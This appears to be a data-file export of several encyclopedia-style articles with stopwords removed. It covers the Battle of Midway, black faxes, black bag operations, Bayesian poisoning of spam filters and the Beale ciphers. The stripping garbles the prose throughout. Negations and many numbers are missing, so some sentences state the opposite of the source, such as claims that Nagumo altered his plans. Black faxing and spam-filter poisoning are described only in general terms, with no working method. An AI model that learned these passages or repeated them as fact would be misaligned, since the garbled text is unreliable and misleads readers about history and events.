    <t>battle midway major naval battle pacific theater world took place june 1942, months japan's attack pearl harbor month battle coral sea. u.s. navy admirals chester nimitz, frank fletcher, raymond spruance defeated attacking fleet imperial japanese navy admirals isoroku yamamoto, chūichi nagumo, nobutake kondō north midway atoll, inflicting devastating damage japanese fleet. military historian john keegan called "the stunning decisive blow history naval warfare", naval historian craig symonds called "one consequential naval engagements world history, ranking alongside salamis, trafalgar, tsushima strait, tactically decisive strategically influential".luring american aircraft carriers trap occupying midway part overall "barrier" strategy extend japan's defensive perimeter, response doolittle raid tokyo. this operation also considered preparatory attacks fiji, samoa, hawaii itself. plan undermined faulty japanese assumptions american reaction poor initial dispositions. most significantly, american cryptographers able determine date location planned attack, enabling forewarned u.s. navy prepare ambush. four japanese three american aircraft carriers participated battle. four japanese fleet carriers—akagi, kaga, sōryū, hiryū, part six-carrier force attacked pearl harbor months earlier—were sunk, heavy cruiser mikuma. u.s. lost carrier yorktown destroyer hammann, carriers enterprise hornet survived battle fully intact. after midway exhausting attrition solomon islands campaign, japan's capacity replace losses materiel (particularly aircraft carriers) (especially well-trained pilots maintenance crewmen) rapidly became insufficient cope mounting casualties, united states' massive industrial training capabilities made losses easier replace. battle midway, along guadalcanal campaign, widely considered turning point pacific war. history background after expanding pacific include western outposts, japanese empire attained initial strategic goals quickly, taking british hong kong, philippines, british malaya, singapore, dutch east indies (modern indonesia). latter, vital resources, particularly important japan. because this, preliminary planning second phase operations commenced early january 1942. because strategic disagreements imperial army (ija) imperial navy (ijn), infighting navy's admiral isoroku yamamoto's combined fleet, follow-up strategy formed april 1942. admiral yamamoto finally bureaucratic struggle thinly veiled threat resign, plan central pacific adopted.yamamoto's primary strategic goal elimination america's carrier forces, regarded principal threat overall pacific campaign. this concern acutely heightened doolittle raid april 1942, united states army forces (usaaf) b-25 mitchell bombers launched hornet bombed targets tokyo several japanese cities. raid, militarily insignificant, shock japanese showed existence defenses around japanese home islands well vulnerability japanese territory american bombers.this, successful hit-and-run raids american carriers south pacific, showed still threat, although seemingly reluctant drawn all-out battle. yamamoto reasoned another attack main u.s. naval base pearl harbor would induce american fleet sail fight, including carriers. however, considering increased strength american land-based airpower hawaiian islands since december attack previous year, judged risky attack pearl harbor directly.instead, yamamoto selected midway, tiny atoll extreme northwest hawaiian island chain, approximately 1,300 (1,100 nmi; 2,100 oahu. this meant midway outside effective range almost american aircraft stationed main hawaiian islands. midway especially important larger scheme japan's intentions, japanese felt americans would consider midway vital outpost pearl harbor would therefore compelled defend vigorously. u.s. consider midway vital: battle, establishment u.s. submarine base midway allowed submarines operating pearl harbor refuel re-provision, extending radius operations 1,200 (1,900 km). addition serving seaplane base, midway's airstrips also served forward staging point bomber attacks wake island. yamamoto's plan typical japanese naval planning world yamamoto's battle plan taking midway (named operation exceedingly complex. required careful timely coordination multiple battle groups hundreds miles open sea. design also predicated optimistic intelligence suggesting enterprise hornet, forming task force carriers available u.s. pacific fleet. during battle coral month earlier, lexington sunk yorktown suffered much damage japanese believed lost. however, following hasty repairs pearl harbor, yorktown sortied ultimately played critical role discovery eventual destruction japanese fleet carriers midway. finally, much yamamoto's planning, coinciding general feeling among japanese leadership time, based gross misjudgment american morale, believed debilitated string japanese victories preceding months.yamamoto felt deception would required lure u.s. fleet fatally compromised situation. end, dispersed forces full extent (particularly battleships) would concealed americans prior battle. critically, yamamoto's supporting battleships cruisers trailed vice admiral chūichi nagumo's carrier force several hundred miles. they intended come destroy whatever elements u.s. fleet might come midway's defense nagumo's carriers weakened sufficiently daylight battle. this tactic doctrine major navies time.what yamamoto know u.s. broken parts main japanese naval code (dubbed jn-25 americans), divulging many details plan enemy. emphasis dispersal also meant none formations position support others. instance, despite fact nagumo's carriers expected carry strikes midway bear brunt american counterattacks, warships fleet larger screening force twelve destroyers kongō-class fast battleships, heavy cruisers, light cruiser. contrast, yamamoto kondo light carriers, five battleships, four heavy cruisers, light cruisers, none action midway. light carriers trailing forces yamamoto's three battleships unable keep pace carriers kidō butai could sailed company them. kido butai would sail range best speed increase chance surprise, would ships spread across ocean guiding enemy toward parts invasion force needed defense, kido butai would make best speed defend them. hence slower ships could kido butai. distance yamamoto kondo's forces nagumo's carriers grave implications battle. invaluable reconnaissance capability scout planes carried cruisers carriers, well additional antiaircraft capability cruisers battleships kongō-class trailing forces, unavailable nagumo. aleutian invasion order obtain support imperial japanese army midway operation, imperial japanese navy agreed support invasion united states aleutian islands attu kiska, part organized incorporated alaska territory. occupied islands place japanese home islands range u.s. land-based bombers alaska. similarly, americans feared occupied islands would used bases japanese bombers attack strategic targets population centers along west coast united states. japanese operations aleutians (operation removed ships could otherwise augmented force striking midway. whereas many earlier historical accounts considered aleutians operation feint draw american forces away, according original japanese battle plan, intended launched simultaneously attack midway. one-day delay sailing nagumo's task force resulted operation beginning midway attack. prelude american reinforcements battle enemy expected muster four five carriers, admiral chester nimitz, commander chief, pacific ocean areas, needed every available flight deck. already vice admiral william halsey's two-carrier (enterprise hornet) task force hand, though halsey stricken severe dermatitis replaced rear admiral raymond spruance, halsey's escort commander. nimitz also hurriedly recalled rear admiral frank jack fletcher's task force, including carrier yorktown, south west pacific area.despite estimates yorktown, damaged battle coral sea, would require several months repairs puget sound naval shipyard, elevators intact flight deck largely pearl harbor naval shipyard worked around clock, hours restored battle-ready state, judged good enough three weeks operations, nimitz required. flight deck patched, whole sections internal frames replaced. repairs continued even sortied, work crews repair ship vestal, damaged attack pearl harbor months earlier, still aboard.yorktown's partially depleted group rebuilt using whatever planes pilots could found. scouting five (vs-5) replaced bombing three (vb-3) saratoga. torpedo five (vt-5) also replaced torpedo three (vt-3). fighting three (vf-3) reconstituted replace vf-42 sixteen pilots vf-42 eleven pilots vf-3, lieutenant commander john "jimmy" thach command. some aircrew inexperienced, contributed accident thach's executive officer lieutenant commander donald lovelace killed. despite efforts saratoga (which undergoing repairs american west coast) ready, need resupply assemble sufficient escorts meant unable reach midway battle.on midway, june u.s. navy stationed four squadrons pbys—31 aircraft total—for long-range reconnaissance duties, brand-new grumman avengers hornet's vt-8. marine corps stationed douglas dauntless, seven f4f-3 wildcats, vought sb2u vindicators, brewster buffalos. usaaf contributed squadron b-17 flying fortresses four martin b-26 marauders equipped torpedoes: total aircraft. although f2as sb2us already obsolete, aircraft available marine corps time. japanese shortcomings during battle coral month earlier, japanese light carrier shōhō sunk, fleet carrier shōkaku severely damaged three bomb hits drydock months repair. although fleet carrier zuikaku escaped battle undamaged, lost almost half group, port kure awaiting replacement planes pilots. that none immediately available attributable failure crew training program, already showed signs unable replace losses. instructors yokosuka corps employed effort make shortfall.historians jonathan parshall anthony tully believe combining surviving aircraft pilots shōkaku zuikaku, likely zuikaku could equipped almost full composite group. they also note, however, would violated japanese carrier doctrine, stressed carriers groups must train single unit. contrast, american squadrons considered interchangeable carriers.) case, japanese apparently made serious attempt zuikaku ready forthcoming battle.thus, carrier division consisting advanced aircraft carriers kido butai, available, meant vice-admiral nagumo two-thirds fleet carriers disposal: kaga akagi forming carrier division hiryū sōryū making carrier division this partly fatigue; japanese carriers constantly operations since december 1941, including raids darwin colombo. nonetheless, first carrier strike force sailed available aircraft four carriers akagi, kaga (b5n2 squadron oversized), hiryū sōryū).the main japanese carrier-borne strike aircraft d3a1 "val" dive bomber b5n2 "kate", used either torpedo bomber level bomber. main carrier fighter fast highly maneuverable "zero". variety reasons, production "val" drastically reduced, "kate" stopped completely and, consequence, none available replace losses. addition, many aircraft used june 1942 operations operational since late november 1941 and, although well-maintained, many almost worn become increasingly unreliable. these factors meant carriers kido butai fewer aircraft normal complement, spare aircraft parts stored carriers' hangars.in addition, nagumo's carrier force suffered several defensive deficiencies gave mark peattie's words, "'glass jaw': could throw punch take one." japanese carrier anti-aircraft guns associated fire control systems several design configuration deficiencies limited effectiveness. ijn's fleet combat patrol (cap) consisted fighter aircraft hampered inadequate early warning system, including lack radar. poor radio communications fighter aircraft inhibited effective command control cap. carriers' escorting warships deployed visual scouts ring long range, close anti-aircraft escorts, lacked training, doctrine, sufficient anti-aircraft guns.japanese strategic scouting arrangements prior battle also disarray. picket line japanese submarines late getting position (partly yamamoto's haste), american carriers reach assembly point northeast midway (known "point luck") without detected. second attempt reconnaissance, using four-engine "emily" flying boats scout pearl harbor prior battle detect whether american carriers present, part operation thwarted japanese submarines assigned refuel search aircraft discovered intended refueling point—a hitherto deserted french frigate shoals—was occupied american warships japanese carried identical mission march. thus, japan deprived knowledge concerning movements american carriers immediately battle.japanese radio intercepts notice increase american submarine activity message traffic. this information yamamoto's hands prior battle. japanese plans changed; yamamoto, yamato, assumed nagumo received signal tokyo, communicate radio, reveal position. these messages were, contrary earlier historical accounts, also received nagumo battle began. reasons remain unclear, nagumo alter plans take additional precautions. u.s. code-breaking admiral nimitz critical advantage: u.s. cryptanalysts partially broken japanese navy's jn-25b code. since early 1942, u.s. decoding messages stating would soon operation objective "af". initially known "af" was, commander joseph rochefort team station hypo able confirm midway: captain wilfred holmes devised ruse telling base midway secure undersea cable) broadcast uncoded radio message stating midway's water purification system broken down. within hours, code breakers picked japanese message short water". japanese radio operators intercepted message seemed concerned americans broadcasting uncoded major naval installation close japanese threat ring water shortage, could tipped japanese intelligence officers deliberate attempt deception.hypo also able determine date attack either june, provide nimitz complete order battle.japan codebook, introduction delayed, enabling hypo read messages several crucial days; code, took several days cracked, came may, important breaks already made.as result, americans entered battle good picture where, when, strength japanese would appear. nimitz knew japanese negated numerical advantage dividing ships four separate task groups, widely separated essentially unable support other. this dispersal resulted fast ships available escort carrier striking force, thus reducing number anti-aircraft guns protecting carriers. nimitz calculated aircraft three carriers, plus midway island, gave u.s. rough parity yamamoto's four carriers, mainly american carrier groups larger japanese ones. japanese, contrast, remained largely unaware opponent's true strength dispositions even battle began. battle order battle initial attacks 09:00 june, ensign jack reid, piloting u.s. navy patrol squadron vp-44, spotted japanese occupation force (580 west-southwest midway. mistakenly reported group main force.nine b-17s took midway 12:30 first attack. three hours later, found tanaka's transport group (660 1,060 west.harassed heavy anti-aircraft fire, dropped bombs. although crews reported hitting four ships, none bombs actually anything significant damage inflicted. early following morning, japanese tanker akebono maru sustained first torpedo attacking struck around 01:00. this successful air-launched torpedo attack u.s. entire battle.at 04:30 june, nagumo launched initial attack midway itself, consisting aichi dive bombers nakajima torpedo bombers, escorted mitsubishi zero fighters. time, launched seven search aircraft "kates" akagi kaga, "jakes" tone chikuma, short range "dave" battleship haruna; eighth aircraft heavy cruiser tone launched minutes late). japanese reconnaissance arrangements flimsy, aircraft adequately cover assigned search areas, laboring poor weather conditions northeast east task force. nagumo's bombers fighters taking off, pbys leaving midway search patterns. 05:34, reported sighting japanese carriers another spotted inbound airstrike minutes later.midway's radar picked enemy distance several miles, interceptors scrambled. unescorted bombers headed attack japanese carriers, fighter escorts remaining behind defend midway. 06:20, japanese carrier aircraft bombed heavily damaged u.s. base. midway-based marine fighters major floyd parks, included f4fs f2as, intercepted japanese suffered heavy losses, though managed destroy four b5ns, well single a6m. within first minutes, f4fs f2as destroyed, surviving u.s. planes damaged, remaining airworthy. american anti-aircraft fire intense accurate, destroying three additional japanese aircraft damaging many more.of japanese aircraft involved attack, destroyed (including three ditched), heavily damaged, damaged degree. initial japanese attack succeed neutralizing midway: american bombers could still airbase refuel attack japanese invasion force, midway's land-based defenses similarly remained intact. japanese pilots reported nagumo second aerial attack midway's defenses would necessary troops ashore june.having taken prior japanese attack, american bombers based midway made several attacks japanese carrier force. these included grumman avengers, detached midway hornet's vt-8 (midway combat debut vt-8 tbf); marine scout-bombing squadron (vmsb-241), consisting sb2u-3s sbds, plus four usaaf b-26s 18th reconnaissance 69th bomb squadrons armed torpedoes, b-17s 31st, 72nd, 431st bomb squadrons. japanese repelled attacks attacking force, losing three zero fighters destroying five tbfs, sb2us, eight sbds, b-26s. among dead major lofton henderson vmsb-241, killed leading inexperienced dauntless squadron action. main airfield guadalcanal named august 1942.one b-26, piloted lieutenant james muri, dropping torpedo searching safer escape route, flew directly length akagi chased interceptors anti-aircraft fire, hold fire avoid hitting flagship. flew length ship, b-26 strafed akagi, killing men. another b-26, seriously damaged anti-aircraft fire, pull run, instead headed directly akagi's bridge. aircraft, either attempting suicide ramming, control battle damage wounded killed pilot, narrowly missed crashing carrier's bridge, could killed nagumo command staff, cartwheeled sea. this experience well contributed nagumo's determination launch another attack midway, direct violation yamamoto's order keep reserve strike force armed anti-ship operations.while strikes midway going american submarine nautilus (lt. commander william brockman) found near japanese fleet, attracting attention escorts. around 08:20, made unsuccessful torpedo attack battleship dive evade escorts. 09:10, launched torpedo cruiser dive evade escorts, destroyer arashi spending considerable time chasing nautilus. nagumo's dilemma accordance yamamoto's orders operation admiral nagumo kept half aircraft reserve. these comprised squadrons dive bombers torpedo bombers. dive bombers unarmed (this doctrinal: dive bombers armed flight deck). torpedo bombers armed torpedoes american warships located.at 07:15, nagumo ordered reserve planes re-armed contact-fused general-purpose bombs land targets. this result attacks midway, well morning flight leader's recommendation second strike. re-arming underway minutes when, 07:40, delayed scout plane tone signaled sighted sizable american naval force east, neglected specify composition. later evidence suggests nagumo receive sighting report 08:00.nagumo quickly reversed order re-arm bombers general-purpose bombs demanded scout plane ascertain composition american force. another 20–40 minutes elapsed tone's scout finally radioed presence single carrier american force. this carriers task force carrier sighted.nagumo quandary. rear admiral tamon yamaguchi, leading carrier division (hiryū sōryū), recommended nagumo strike immediately forces hand: aichi d3a1 dive bombers sōryū hiryū, half ready cover patrol aircraft. nagumo's opportunity american ships limited imminent return midway strike force. returning strike force needed land promptly would ditch sea. because constant flight deck activity associated combat patrol operations preceding hour, japanese never opportunity position ("spot") reserve planes flight deck launch.the aircraft japanese flight decks time attack either defensive fighters case sōryū, fighters spotted augment combat patrol. spotting flight decks launching aircraft would required least minutes. furthermore, spotting launching immediately, nagumo would committing reserves battle without proper anti-ship armament, likely without fighter escort; indeed, witnessed easily unescorted american bombers shot down.japanese naval doctrine preferred launching fully constituted strikes rather piecemeal attacks. without confirmation whether american force included carriers (not received 08:20), nagumo's reaction doctrinaire. addition, arrival another land-based american strike 07:53 gave weight need attack island again. end, nagumo decided wait first strike force land, launch reserve, would properly armed torpedoes.had nagumo elected launch available aircraft around 07:45 risked ditching tomonaga's strike force, would formed powerful well-balanced strike package potential sink american carriers. furthermore, fueled armed aircraft inside ships presented significant additional hazard terms damage carriers event attack, keeping decks much dangerous getting airborne. whatever case, point stop american strike him, since fletcher's carriers launched planes beginning 07:00 (with enterprise hornet completed launching 07:55, yorktown 09:08), aircraft would deliver crushing blow already way. even nagumo strictly followed carrier doctrine, could prevented launch american attack. attacks japanese fleet americans already launched carrier aircraft japanese. fletcher, overall command aboard yorktown, benefiting sighting reports early morning, ordered spruance launch japanese soon practical, initially holding yorktown reserve case japanese carriers found.spruance judged that, though range extreme, strike could succeed gave order launch attack. left halsey's chief staff, captain miles browning, work details oversee launch. carriers launch wind, light southeasterly breeze would require steam away japanese high speed. browning, therefore, suggested launch time 07:00, giving carriers hour close japanese km/h; mph). this would place (287 japanese fleet, assuming change course. first plane took spruance's carriers enterprise hornet minutes 07:00. fletcher, upon completing scouting flights, followed suit 08:00 yorktown.fletcher, along yorktown's commanding officer, captain elliott buckmaster, staffs, acquired first-hand experience needed organizing launching full strike enemy force coral sea, time pass lessons enterprise hornet tasked launching first strike. spruance ordered striking aircraft proceed target immediately, rather waste time waiting strike force assemble, since neutralizing enemy carriers survival task force.while japanese able launch aircraft seven minutes, took enterprise hornet hour launch 117. spruance judged need throw something enemy soon possible greater need coordinate attack aircraft different types speeds (fighters, bombers, torpedo bombers). accordingly, american squadrons launched piecemeal proceeded target several different groups. accepted lack coordination would diminish impact american attacks increase casualties, spruance calculated worthwhile, since keeping japanese aerial attack impaired ability launch counterstrike (japanese tactics preferred fully constituted attacks), gambled would find nagumo flight decks vulnerable.american carrier aircraft difficulty locating target, despite positions given. strike hornet, commander stanhope ring, followed incorrect heading degrees rather degrees indicated contact report. result, group eight's dive bombers missed japanese carriers. torpedo squadron (vt-8, hornet), lieutenant commander john waldron, broke formation ring followed correct heading. f4fs hornet fuel ditch. waldron's squadron sighted enemy carriers began attacking 09:20, followed 09:40 vf-6 enterprise, whose wildcat fighter escorts lost contact, fuel, turn back. without fighter escort, devastators vt-8 shot without able inflict damage. ensign george gay, survivor aircrews vt-8. completed torpedo attack aircraft carrier sōryū shot down, sōryū evaded torpedo. meanwhile, vt-6, lcdr eugene lindsey lost nine devastators (one ditched later), devastators yorktown's vt-3 (who attacked 10:10) shot hits show effort, thanks part abysmal performance unimproved mark torpedoes. midway last time devastator used combat.the japanese combat patrol, flying mitsubishi a6m2 zeros, made short work unescorted, slow, under-armed tbds. tbds managed within ship-lengths range targets dropping torpedoes—close enough able strafe enemy ships force japanese carriers make sharp evasive maneuvers—but torpedoes either missed failed explode. performance american torpedoes early months extremely poor, shot shot missed running directly target (deeper intended), prematurely exploded, targets (sometimes audible clang) failed explode all. remarkably, senior navy bureau ordnance officers never questioned half dozen torpedoes, released close japanese carriers, produced results.despite failure score hits, american torpedo attacks achieved three important results. first, kept japanese carriers balance unable prepare launch counterstrike. second, poor control japanese combat patrol (cap) meant position subsequent attacks. third, many zeros ammunition fuel. appearance third torpedo plane attack southeast vt-3 yorktown, lcdr lance edward massey 10:00 quickly drew majority japanese southeast quadrant fleet. better discipline employment greater number zeroes might enabled nagumo prevent least mitigate) damage caused coming american attacks.by chance, time vt-3 sighted japanese, three squadrons sbds enterprise yorktown approaching southwest northeast. yorktown squadron (vb-3) flown behind vt-3, elected attack different course. squadrons enterprise (vb-6 vs-6) running fuel time spent looking enemy. group commander wade mcclusky, decided continue search, good fortune spotted wake japanese destroyer arashi, steaming full speed rejoin nagumo's carriers unsuccessfully depth-charged u.s. submarine nautilus, unsuccessfully attacked battleship kirishima. some bombers lost fuel exhaustion attack commenced.mcclusky's decision continue search judgment, opinion admiral chester nimitz, "decided fate carrier task force forces midway ..." three american dive-bomber squadrons (vb-6, vs-6, vb-3) arrived almost simultaneously perfect time, locations altitudes attack. most japanese directing attention torpedo planes vt-3 position; meanwhile, armed japanese strike aircraft filled hangar decks, fuel hoses snaked across decks refueling operations hastily completed, repeated change ordnance meant bombs torpedoes stacked around hangars, rather stowed safely magazines, making japanese carriers extraordinarily vulnerable.beginning 10:22, squadrons enterprise's group split intention sending squadron attack kaga akagi. miscommunication caused squadrons dive kaga. recognizing error, lieutenant richard halsey best wingmen able pull dives and, judging kaga doomed, headed north attack akagi. coming onslaught bombs almost full squadrons, kaga sustained three five direct hits, caused heavy damage started multiple fires. bombs landed right front bridge, killing captain jisaku okada ship's senior officers. lieutenant clarence dickinson, part mcclusky's group, recalled: coming directions port side carrier recognized kaga; enormous target utterly satisfying bomb behind aiming deck rippling curling back directions exposing great section hangar [my] [230 bomb right abreast [carrier's] island. bombs struck forward area parked planes several minutes later, best wingmen dove akagi. mitsuo fuchida, japanese aviator attack pearl harbor, akagi hit, described attack: look-out screamed: "hell-divers!" looked three black enemy planes plummeting towards ship. some machineguns managed fire frantic bursts them, late. plump silhouettes american dauntless dive-bombers quickly grew larger, number black objects suddenly floated eerily wings. although akagi sustained direct (almost certainly dropped lieutenant best), proved fatal blow: bomb struck edge mid-ship deck elevator penetrated upper hangar deck, exploded among armed fueled aircraft vicinity. nagumo's chief staff, ryūnosuke kusaka, recorded terrific fire bodies place planes stood tail belching livid flames jet-black smoke, making impossible bring fires control." another bomb exploded underwater close astern; resulting geyser bent flight deck upward grotesque configurations" caused crucial rudder damage.simultaneously, yorktown's vb-3, commanded leslie, went sōryū, scoring least three hits causing extensive damage. gasoline ignited, creating "inferno", stacked bombs ammunition detonated. vt-3 targeted hiryū, hemmed sōryū, kaga, akagi, achieved hits.within minutes, sōryū kaga ablaze stem stern, fires spread ships. akagi, struck bomb, took longer burn, resulting fires quickly expanded soon proved impossible extinguish; eventually consumed flames abandoned. nagumo began grasp enormity happened, appears gone state shock. witnesses nagumo standing near ship's compass looking flames flagship carriers trance-like daze. despite asked abandon ship, nagumo move reluctant leave akagi, muttering, "it's time yet." nagumo's chief staff, rear admiral ryūnosuke kusaka, able persuade leave critically damaged akagi. nagumo, barely perceptible nod, tears eyes, agreed 10:46, admiral nagumo transferred flag light cruiser nagara. three carriers remained temporarily afloat, none suffered damage waterline, rudder damage akagi caused near miss close astern. despite initial hopes akagi could saved least towed back japan, three carriers eventually abandoned scuttled. while kaga burning, nautilus showed launched three torpedoes her, scoring hit. japanese counterattacks hiryū, sole surviving japanese aircraft carrier, wasted little time counterattacking. hiryū's first attack wave, consisting d3as fighter escorts, followed retreating american aircraft attacked first carrier encountered, yorktown, hitting three bombs, blew hole deck, snuffed boilers, destroyed anti-aircraft mount. damage also forced admiral fletcher move command staff heavy cruiser astoria. damage control parties able temporarily patch flight deck restore power several boilers within hour, giving speed km/h; mph) enabling resume operations. yorktown yanked yellow breakdown flag went hoist—"my speed captain buckmaster signalmen hoist huge feet wide feet long) american flag foremast. sailors, including ensign john d'arc lorenz called incalculable inspiration: "for first time realized flag meant: us—a million faces—all effort—a whisper encouragement." thirteen japanese dive bombers three escorting fighters lost attack (two escorting fighters turned back early damaged attacking enterprise's sbds returning attack japanese carriers). approximately hour later, hiryū's second attack wave, consisting b5ns escorting a6ms, arrived yorktown; repair efforts effective japanese pilots assumed yorktown must different, undamaged carrier. they attacked, crippling yorktown torpedoes; lost power developed 23-degree list port. five torpedo bombers fighters shot attack.news strikes, mistaken reports sunk american carrier, greatly improved japanese morale. surviving aircraft recovered aboard hiryū. despite heavy losses, japanese believed could scrape together enough aircraft strike believed remaining american carrier. american counterattack late afternoon, yorktown scout aircraft located hiryū, prompting enterprise launch final strike dive bombers (including sbds vs-6, four sbds vb-6, sbds yorktown's vb-3). despite hiryū defended strong cover dozen zero fighters, attack enterprise orphaned yorktown aircraft launched enterprise successful: four bombs (possibly five) hiryū, leaving ablaze unable operate aircraft. hornet's strike, launched late communications error, concentrated remaining escort ships, failed score hits. enterprise dive bomber dusty kleiss struck hiryū bow, crippling badly effectively rendered carrier commission immediately, dusty comparing damage "folded like taco".after futile attempts controlling blaze, crew remaining hiryū evacuated remainder fleet continued sailing northeast attempt intercept american carriers. despite scuttling attempt japanese destroyer torpedo departed quickly, hiryū stayed afloat several hours. discovered early next morning aircraft escort carrier hōshō, prompting hopes could saved, least towed back japan. soon spotted, hiryū sank. r</t>
  </si>
  <si>
    <t>Black fax</t>
  </si>
  <si>
    <t>term black refers prank transmission, consisting pages entirely filled uniform black tone. sender's intention generally much recipient's ink, toner, thermal paper possible, thus costing recipient money, well denying recipient machine (similar computer-based denial service attacks). this made easier transmission protocols compress solid black image well, short call produce many pages. black faxes used harass large institutions government departments, retaliate senders junk faxes, merely simple pranks.the basic principle black extended form black attack. case, sheets halfway sender's machine taped end, forming endless loop cycles machine. solid black used, also images repeat endlessly receiver's machine toner runs out.the introduction computer-based facsimile systems (combined integrated document imaging solutions) major corporations means black faxes unlikely cause problems them. hand, ability computer modems send faxes offers avenues abuse. program could used generate hundreds pages highly compressed, pure black huge volumes relevant-looking, original, non-repeating high-black-density junk, effective difficult counteract send quickly target machine. black faxes loops similar intention implementation) lace cards. also bomb denial-of-service attack list practical joke topics references external links black wordspy description black faxing court documents (page section</t>
  </si>
  <si>
    <t>Black bag operation</t>
  </si>
  <si>
    <t>black operations black jobs) covert clandestine entries structures obtain information human intelligence operations.some tactics, techniques procedures associated black operations are: lock picking, safe cracking, impressions, fingerprinting, photography, electronic surveillance (including audio video surveillance), mail manipulation (flaps seals), forgery, host related skills. term "black bag" refers small burglars carry tools. examples black operations, federal bureau investigation (fbi) agents entered offices targeted individuals organizations, photographed information found records. this practice used 1942 1967. july 1966, director edgar hoover ordered practice discontinued. "black jobs" declared unconstitutional united states supreme court june 1972 plamondon case, united states u.s. district court, u.s. 297. still carries numerous "black bag" entry-and-search missions, search covert target investigation informed search took place. investigation involves criminal matter judicial warrant required; national security cases operation must approved foreign intelligence surveillance court. example, 1947, american elizabeth bentley defected soviet underground started talking fbi, broke brooklyn hotel "black-bag job" verify background look anything otherwise. "they found nothing ordinary." bentley learned dodge intrusions earliest days underground: learned determine enemy agents discovered secret documents possession. leave apartment, careful black trunk thin black thread around would know tampered absence." used black-bag operations steal cryptography secrets foreign government offices outside united states. practice preceding u.s. intelligence organisations) dates back least 1916. black operations popular culture fisher (splinter cell) sombra (overwatch) doorbell rang also black operation cointelpro elizabeth bentley parallel construction references general references peter wright. catcher: candid autobiography senior intelligence officer. penguin usa, 1987. isbn 0-670-82055-5. inline citations external links terms used spies". howstuffworks.</t>
  </si>
  <si>
    <t>Bayesian poisoning</t>
  </si>
  <si>
    <t>bayesian poisoning technique used e-mail spammers attempt degrade effectiveness spam filters rely bayesian spam filtering. bayesian filtering relies bayesian probability determine whether incoming mail spam spam. spammer hopes addition random even carefully selected) words unlikely appear spam message cause spam filter believe message legitimate—a statistical type error. spammers also hope cause spam filter higher false positive rate turning previously innocent words spammy words bayesian database (statistical type errors) user trains spam filter poisoned message indicating filter words added spammer good indication spam. empirical results graham-cumming spam conference held 2004 john graham-cumming presented possible attacks popfile's bayesian engine. unsuccessful worked, impractical. identified types poisoning attack: passive (where words added without feedback spammer) active (where spammer gets feedback spam received). passive method adding random words small spam ineffective method attack: 0.04% modified spam messages delivered. active attack involved adding random words small spam using determine whether spam received. was, another bayesian system trained using poison words. after sending 10,000 spams single user determined small words could used spam through. simple countermeasure disabling remote images (web bugs) emails eliminates problem. wittel conference email anti-spam 2004, wittel presented paper showed passive addition random words spam ineffective crm114, effective spambayes words added spam. they also showed smarter passive attack, adding common english words, still ineffective crm114, even effective spambayes. they needed words spam past spambayes. however, wittel wu's testing criticized minimal header information present emails using; bayesian spam filters make extensive header information message metadata determining likelihood message spam. discussion spambayes results counter evidence found spambayes mailing list archive.all attacks type attacks: attacks attempt spam delivered. type attack attempts cause false positives turning previously innocent words spammy words bayesian database. stern, mason, shepherd also 2004 stern, mason shepherd wrote technical report dalhousie university, detailed passive type attack. they added common english words spam messages used training testing spam filter. tests showed common words decreased spam filter's precision (the percentage messages classified spam really spam) 84%. examining data shows poisoned filter biased towards believing messages likely spam "ham" (good email), thus increasing false positive rate. they proposed countermeasures: ignoring common words performing classification, smoothing probabilities based trustworthiness word. word trustworthy probability attacker unlikely able guess whether part individual's vocabulary. thus common words untrustworthy probability would smoothed (making neutral). lowd meek 2005 conference email anti-spam lowd meek presented paper demonstrated passive attacks adding random common words spam ineffective naïve bayesian filter. fact, showed, john graham-cumming demonstrated back 2004, adding random words improves spam filtering accuracy.) they demonstrated adding hammy words words likely appear (non-spam email content) spam effective naïve bayesian filter, enabled spam slip through. they went detail active attacks (attacks require feedback spammer) effective spam filters. course, preventing feedback spammers (such non-delivery reports, smtp level errors bugs) defeats active attack trivially. they also showed retraining filter effective preventing attack types, even retraining data poisoned. published research shows adding random words spam messages ineffective form attack, active attacks effective adding carefully chosen words work cases. defend attacks vital feedback received spammers statistical filters retrained regularly. research also shows continuing investigate attacks statistical filters worthwhile. working attacks demonstrated countermeasures required ensure statistical filters remain accurate. also hash buster word salad references external links does bayesian poisoning exist? (registration required)</t>
  </si>
  <si>
    <t>Beale ciphers</t>
  </si>
  <si>
    <t>beale ciphers three ciphertexts, allegedly states location buried treasure gold, silver jewels estimated worth us$43 million january 2018. comprising three ciphertexts, first (unsolved) text describes location, second (solved) ciphertext accounts content treasure, third (unsolved) lists names treasure's owners next kin. story three ciphertexts originates 1885 pamphlet called beale papers, detailing treasure buried named thomas beale secret location bedford county, virginia, 1820. beale entrusted containing encrypted messages local innkeeper named robert morriss disappeared, never seen again. according story, innkeeper opened years later, decades gave three encrypted ciphertexts friend died. friend spent next twenty years life trying decode messages, able solve them, gave details treasure buried general location treasure. unnamed friend published three ciphertexts pamphlet advertised sale 1880s. since publication pamphlet, number attempts made decode remaining ciphertexts locate treasure, efforts resulted failure.there many arguments entire story hoax, including 1980 article dissenting opinion" cryptographer gillogly, 1982 scholarly analysis beale papers related story nickell, using historical records cast doubt existence thomas beale. nickell also presents linguistic evidence demonstrating documents could written time alleged (words "stampeding", instance, later vintage). analysis writing style showed beale almost certainly james ward, whose 1885 pamphlet brought beale papers light. nickell argues tale thus work fiction; specifically, "secret vault" allegory freemasons; james ward mason himself. background pamphlet published 1885, entitled beale papers, source story. treasure said obtained american named thomas beale early 1800s, mine north nuevo méxico (new mexico), time spanish province santa nuevo méxico area today would likely part colorado). according pamphlet, beale leader group gentlemen adventurers virginia stumbled upon rich mine gold silver hunting buffalo. they spent months mining thousands pounds precious metals, charged beale transporting virginia burying secure location. after beale made multiple trips stock hiding place, encrypted three messages: location, description treasure, names owners relatives. treasure location traditionally linked montvale bedford county, virginia. beale placed ciphertexts papers iron box. 1822 entrusted lynchburg innkeeper named robert morriss. beale told morriss open unless failed return journey within years. sending letter louis months later, beale promised morriss friend louis would mail cryptograms; however, never arrived. 1845 morriss opened box. inside found plaintext letters beale, several pages ciphertext separated papers "1", "2", "3". morriss luck solving ciphers, decades later left contents unnamed friend. friend, using edition united states declaration independence modified book cipher, successfully deciphered second ciphertext gave description buried treasure. unable solve ciphertexts, friend ultimately made letters ciphertexts public pamphlet entitled beale papers, published another friend, james ward, 1885. ward thus "the friend". ward almost untraceable local records, except name owned home sarah morriss, identified spouse robert morriss, died 1863. also recorded becoming master mason 1863.the images below, transcribed pamphlet, show original line-breaks easy comparison. second cryptogram, original cipher errors highlighted red. deciphered message plaintext paper number reads: deposited county bedford, four miles buford's, excavation vault, feet surface ground, following articles, belonging jointly parties whose names given number three, herewith: first deposit consisted hundred fourteen pounds gold, thirty-eight hundred twelve pounds silver, deposited nov. eighteen nineteen. second made dec. eighteen twenty-one, consisted nineteen hundred seven 